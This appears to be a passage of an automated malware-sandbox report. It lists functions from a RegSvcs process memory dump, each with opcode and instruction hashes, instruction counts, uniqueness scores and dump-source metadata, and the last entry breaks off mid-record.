Opcode ID: 2e356ecfb533e62a346670f5a91ff4c2125986d3b15596bf28d82d99c1aaf51f
Instruction ID: f7a4b720ed71dcc0e750fecd73901d7753b511f3c5c7bed06e6954c8363834f4
Opcode Fuzzy Hash: 2e356ecfb533e62a346670f5a91ff4c2125986d3b15596bf28d82d99c1aaf51f
Instruction Fuzzy Hash: 43318B79A002159FCB14CF18CC849AEB7BAEF84304B154559E80ADB391E772AE51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 016706F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428e0aa9b5c14ba3eaba6fa651793acdae1216f278a01ef6201756f3ac68b271
Instruction ID: 83d2330a66ecf31bdbd7277dfc4eca54f951b3ae16be3ff9cb42a6d7ac5cb05b
Opcode Fuzzy Hash: 428e0aa9b5c14ba3eaba6fa651793acdae1216f278a01ef6201756f3ac68b271
Instruction Fuzzy Hash: FB219C71A0062ADBCB259F59CC81ABEF7F8FF48740B400069F941AB240D778AD52CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0167019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a149e46ba3d4aee423688e798333fea9cffcc239739f73fc149456a8a392ed7f
Instruction ID: 78a2e99042691d865cd88d0371576772c6f6c0df35208ad14b4ebcd71580f7ed
Opcode Fuzzy Hash: a149e46ba3d4aee423688e798333fea9cffcc239739f73fc149456a8a392ed7f
Instruction Fuzzy Hash: 3021A972600605AFD716DBACDD40A6AB7A8FF99740F144169F904DB7A0D738ED40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 01670283 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f8d712a6ec066542e4aaa63efe7bc53ba1dfc91fc3e277119f6f9dcb6ee4be4
Instruction ID: 2fbc8c762af51f99758c16503a6b3ff53a9763eee829a073c8f4eae5c244ff64
Opcode Fuzzy Hash: 6f8d712a6ec066542e4aaa63efe7bc53ba1dfc91fc3e277119f6f9dcb6ee4be4
Instruction Fuzzy Hash: DC21FF729042469FD312EF69CC04B6BBBDCAFA2250F08445AB990C7391D734D944C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 01612835 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d5095f7b12ec46d6093b555c02438b15db85fac8611198cc600e3b260476ad
Instruction ID: baf9a8c8242828d87dba091c982cbf79651bca3cd718d04ef42048554d922025
Opcode Fuzzy Hash: 18d5095f7b12ec46d6093b555c02438b15db85fac8611198cc600e3b260476ad
Instruction Fuzzy Hash: 4B21F6327056829BF323A76C8D14B257B95AF41774F3D0368FE219B7E2DB68C8028254

Uniqueness

Uniqueness Score: -1.00%

Function 0162A30B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91b61c7f973ae2b6a3d2b074f52ec64fe64ab676f6e62fc96f33b8c95b2d0c6d
Instruction ID: da1cacea0c1783243c188ac78d19e93b14e34ee36681d39a5386f55976d21006
Opcode Fuzzy Hash: 91b61c7f973ae2b6a3d2b074f52ec64fe64ab676f6e62fc96f33b8c95b2d0c6d
Instruction Fuzzy Hash: 01219A35200A119FC729DF69CC01B5677E6AF08704F14856CE50ACBB61E371E842CF98

Uniqueness

Uniqueness Score: -1.00%

Function 016AA49A Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6f2856daa523e6f155fbdcbc967b451f7aa729fbed8be0703970f5e67d4ab6f
Instruction ID: 7351fa01a20821bb6888eb14007141a94dbb833d106e3b8e56c6c657fd6a0581
Opcode Fuzzy Hash: a6f2856daa523e6f155fbdcbc967b451f7aa729fbed8be0703970f5e67d4ab6f
Instruction Fuzzy Hash: F4110D72340A117FE32259959C11F67B6DADBD4B60F51006DB795CB1D0DB60DC01CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 01670946 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9715a1d60fb2b4d01cd2aafbe7d6cf0c116db9c7e741d495f9a60eb0fd345e42
Instruction ID: 3682de577733ebbcbdb8414a352800ef70ee645df6c7f12718f968ccb430112a
Opcode Fuzzy Hash: 9715a1d60fb2b4d01cd2aafbe7d6cf0c116db9c7e741d495f9a60eb0fd345e42
Instruction Fuzzy Hash: 8221EBB1E10259ABCB14DF9AD9859AEFBF9FF98610F10012FE505AB340D7709941CF64

Uniqueness

Uniqueness Score: -1.00%

Function 016880A8 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction ID: d27a9b63cb4c4ed7ce6c02872e23954890981ea2b688524878d8735bf5b090b6
Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
Instruction Fuzzy Hash: 10218E72A0020AEFDF22AF98CC40BAEBBBAEF88315F204459F941A7251D734DD51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01620124 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 13bcd0b3e4108fa02c7c725418fd17aa91e783442edf897dbb189bbb86886e55
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 2B11E273600A15BFD7229F84CC45F9ABBB9EB80755F200029F6009F290D671ED44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 015F8770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bac1fba5c0ffb4060a632838df7f874fd0f0c685ad763014803b44cf7d08b5
Instruction ID: b5fde164c8a0e95fcc2ad5b1086835d05ee11b2de96eb54bbc23da8fb38bd03c
Opcode Fuzzy Hash: 51bac1fba5c0ffb4060a632838df7f874fd0f0c685ad763014803b44cf7d08b5
Instruction Fuzzy Hash: 7A11C1357026119BDB15CF4DC4C0A2ABBE9FF9A710B1980ADEF089F204D6B2D901C790

Uniqueness

Uniqueness Score: -1.00%

Function 0162AAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction ID: f3130ee83f8b0e883d675ce0b1d7bafb253d553419e9ab42bc64a29640c51db1
Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction Fuzzy Hash: 1A218E72640A51DFD7358F89C940A66FBE6EB94B11F14883DE5468BB10C7B0EC01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 015F80E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55658c252b36cbd433124f47c9c71ed988972b6e4c0270f70d5224dc2886dc70
Instruction ID: 91770b2976888bde9529e6df76f6fec96c9fd33c606e66344653e82928c6db31
Opcode Fuzzy Hash: 55658c252b36cbd433124f47c9c71ed988972b6e4c0270f70d5224dc2886dc70
Instruction Fuzzy Hash: 72216F75A40205DFCB14CF58C591A6EBBF6FB89314F24426DD205AB351C771AD06CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0162674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6262937406621fb3889699bc4836ea47ce011c8fe47658ef741cea9e182848ed
Instruction ID: 79f4d6247fb11a7a94c5fc0d3eda6b77861edd3f61477373c55d83a9180e8459
Opcode Fuzzy Hash: 6262937406621fb3889699bc4836ea47ce011c8fe47658ef741cea9e182848ed
Instruction Fuzzy Hash: 05216471600A10EFD7258F69DC80B66B7E9FB84250F00882DE9AAC7250EB70EC51CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01686870 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c1c4e5794645edb9799b9d6235871892b336bcf004ac707f8759498a39be17
Instruction ID: 4097d3f21f52889db7806d8ce767e81263c31d6d9de5517280bd58e5b8c0acd2
Opcode Fuzzy Hash: 12c1c4e5794645edb9799b9d6235871892b336bcf004ac707f8759498a39be17
Instruction Fuzzy Hash: AE11E372240505EFCB22EB9DCD40F9A77A8EF99B50F014169F205DB291DB70E801C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0161E8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6418545bbf8be3b03a0b0314e6c30b8693e72e59cd5035827681582488fa6599
Instruction ID: ac062f3a8df2119a97a34e36b93397f51e03fe7838c85d927ab2cdbc6dc35cff
Opcode Fuzzy Hash: 6418545bbf8be3b03a0b0314e6c30b8693e72e59cd5035827681582488fa6599
Instruction Fuzzy Hash: B311E5322011149BCF1ADA29CC85A7B729BEFD5374F294929D922CB394EA31D842C695

Uniqueness

Uniqueness Score: -1.00%

Function 016266B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1492fcad7e80ac01306462c6487196c36264f71353bb3d28fd834525d211b9ec
Instruction ID: 9ca8b9cc4702d574a8f5aad05bf4c03b9f82a75f68b04e9e8c411a897ace1254
Opcode Fuzzy Hash: 1492fcad7e80ac01306462c6487196c36264f71353bb3d28fd834525d211b9ec
Instruction Fuzzy Hash: 2511BC76A01A25DFCB2ACF59ED84A6ABBE9AF94610F01407EDD059B350E730DD00CF94

Uniqueness

Uniqueness Score: -1.00%

Function 016BA8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: 0f55c0d83736177570cbc9f5382ecd63ee3d47aab13a473125b28bb14eb6c107
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: 2011E236A10905AFDB19DB58CC41A9EBBB6FF84210F058269E85597380E631AD41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 015F0AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: 3a066ccbbd3532f90250edce6ad96eeb2cc4f77ed621d8ac3a9ab1564afb4761
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: AD21E3B5A00B099FD3A0CF29C540B56BBF5FB48B10F10492EE98ACBB40E371E814CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0167E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: 2b50fdffde4463e57525888baf607c49eaf266c78bd65f232545d207b7cbcd6c
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: 1311C632600601EFE7219F48CC40B567BE6EF45754F0684ACFA4A9B351D732DC88DB90

Uniqueness

Uniqueness Score: -1.00%

Function 016127ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6733377668e2b9eae90197f746f6a6a5c2d15e3ba970a1ad4e189739f03b1538
Instruction ID: 4eaa8c38b0bcfad3fc9fedc4b359112107777bab19942d4bd518a9cbfac835d8
Opcode Fuzzy Hash: 6733377668e2b9eae90197f746f6a6a5c2d15e3ba970a1ad4e189739f03b1538
Instruction Fuzzy Hash: 9B012672205685AFE316A2ADDC54F276B9DEF80350F1A0169FD008B390EA14DC01C271

Uniqueness

Uniqueness Score: -1.00%

Function 015F4690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c0ee959580c063ea26e310df64ad6bc5c1a585d7f2e7504b8bb4381f762f8a
Instruction ID: 0c594a8a973c5718580e9bae8521d015ef626953fa4015b253cda3428b5ad726
Opcode Fuzzy Hash: 64c0ee959580c063ea26e310df64ad6bc5c1a585d7f2e7504b8bb4381f762f8a
Instruction Fuzzy Hash: 5C11EC36206645AFDB25CF5DC880B2B7BA9FB86B64F00411DFA058F240C770E801CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 016C4B00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 242a8e8226f9f8d1ed6998c49a7707ce0c479f68315ccfc9e55f47a37d4e566e
Instruction ID: 0dfe801a56245a018bb4f1dc334faefd012c407d6b21f4d5bc635ac6a3aecc14
Opcode Fuzzy Hash: 242a8e8226f9f8d1ed6998c49a7707ce0c479f68315ccfc9e55f47a37d4e566e
Instruction Fuzzy Hash: 7711A036200A129FD726DA69DC54B66BBA6FFC4B51F19452DEA42C7790DF30A802CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01626620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46e633e99a789a23364d87e810dd4554a06340eb9f9b3982f03eb6234aba48ce
Instruction ID: 686724e9fa662d1e5ceb8dfbf5a2e7dc653441270a4c14ba11e1f907e91820e2
Opcode Fuzzy Hash: 46e633e99a789a23364d87e810dd4554a06340eb9f9b3982f03eb6234aba48ce
Instruction Fuzzy Hash: 4D119E72A01A36ABDB229F59CD80B5EBBB9FF84750F500058DE01AB340D730AD018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0161EA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084300b5d60d704f1c4cf97cb4983ac9861cce9b13941dad1ffd2d4f9bf268d0
Instruction ID: 034fe09f0bd2e0e114ea8dc2b0d7158bf0a635401a5c6d354cdc4aa26e851c66
Opcode Fuzzy Hash: 084300b5d60d704f1c4cf97cb4983ac9861cce9b13941dad1ffd2d4f9bf268d0
Instruction Fuzzy Hash: 0601C47650010A9FC316DF18DC04E16B7EAFB81718F24426EE6068B265D771DC51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0161E53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: a71b4087b378b5323df35fa9999e9d7d34e03687f12dd39d507a7be453f1931c
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: 5311A172601AC2DFE763972DCD54B257BA4AB51798F1D00E4EE418B7D2F72AC842C251

Uniqueness

Uniqueness Score: -1.00%

Function 0167E75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: 31214c1f21afbcbfd560729a16f4462c202aab4d44ae42a294158ff903c95a50
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 1701C036700206AFE7219B58CC00B6ABAAAEB81750F1585A8EA059B260E772DD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015EA250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: fdc6647ef783c4f303d6456cf0e6cad15b935ca476ef3fcd00c54caa0fa6aa71
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: B50126318047219BDB358F29D844A367BE5FF557607008A2DFC95AF281C331D800CB60

Uniqueness

Uniqueness Score: -1.00%

Function 016C4940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317c8673cd6d89528f88ff7d454ef4f50e4439c82a85a88232853696ae64f2ef
Instruction ID: 5d32581f9d792442f5f6c23274db3259395686224783fb1b3444c3147d76965b
Opcode Fuzzy Hash: 317c8673cd6d89528f88ff7d454ef4f50e4439c82a85a88232853696ae64f2ef
Instruction Fuzzy Hash: 9E01E1324415219BC322DB18CC20EA2B7A9EB91B70B15421DE9699B292DB20D801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0166E1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4561990e5b5822625f91c65af0856173e08be376af6a5eee5a20e2ccf3f0e62
Instruction ID: c824c78fbf10f2f80174858b5fabdcdd0128e57a0b3d462bbb40b6684addc034
Opcode Fuzzy Hash: f4561990e5b5822625f91c65af0856173e08be376af6a5eee5a20e2ccf3f0e62
Instruction Fuzzy Hash: FF11AD36241641EFDB16EF19CD90F16BBBAFF98B44F240069EA059B7A1C335ED01CA90

Uniqueness

Uniqueness Score: -1.00%

Function 015F6259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bd922b8ab28801f8f1bcb6570d5700ab2a10fc041ff2f83954932c2dd14917
Instruction ID: a54e60dfe60ac8eb776b8c960934d677a00c92961e5a0364a1a67e95f1e9dbb7
Opcode Fuzzy Hash: 24bd922b8ab28801f8f1bcb6570d5700ab2a10fc041ff2f83954932c2dd14917
Instruction Fuzzy Hash: 3C11A070501228ABDB29EB24CD51FEDB3B5BF44714F5041D8A315AA1E0DB709E81CF88

Uniqueness

Uniqueness Score: -1.00%

Function 01676050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d470ab25ccf2b5ff8ec1b3f2ed94df469fb5e9c9fbb50c72912a4c0db2ec45
Instruction ID: 1e31c7bc567adee3a5e84ec712f75f396f0fc506f497664a1d8d2f3d52abbc78
Opcode Fuzzy Hash: b6d470ab25ccf2b5ff8ec1b3f2ed94df469fb5e9c9fbb50c72912a4c0db2ec45
Instruction Fuzzy Hash: BF111773900019ABCB16DB94CC84DDFBBBDEF48258F044166E906A7211EA34AA15CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 015F208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: cca57b6f0f66ceba9ba7d5e20c35130254b36d394af79a87618fb7a3bffff753
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: 9F01F1736011118BEF169A6DDC80AA67BABBFC4600F5944ADEE058F24ADA71CC81C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01686500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997c99e001dbbd703c7ce704634ca69d2a8dd8c61af6830596b253dfc294eb78
Instruction ID: 7626e5e2498b1f7a2075815fc307fabf5381646c3880fb8e8606651b808f2c05
Opcode Fuzzy Hash: 997c99e001dbbd703c7ce704634ca69d2a8dd8c61af6830596b253dfc294eb78
Instruction Fuzzy Hash: 0A11E1326401469FC311DF18CC00BA2BBB9FB5A304F088259E9498F316D732EC81CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0167C810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f931f01c86b2b5c5b49185561267f638648fe02253b3ac68c9edea8bef731cac
Instruction ID: 7c2272cb215355d6d4b55a9c2d16f10df323cf02f614ed27e77b4790adf0dc0a
Opcode Fuzzy Hash: f931f01c86b2b5c5b49185561267f638648fe02253b3ac68c9edea8bef731cac
Instruction Fuzzy Hash: 1611E8B1A0021A9FCB04DFA9D941AAEBBF9FF58350F10406AA905E7351D674EE01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0169EA60 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e46d70538c1413ed22b7798cdb1c30b8f3f2d7fe7880f2f92d1fe1afa0a782ad
Instruction ID: d6e81973a0f14bc875441e09edd605a7359131a7dec6939c3312720b11a818f3
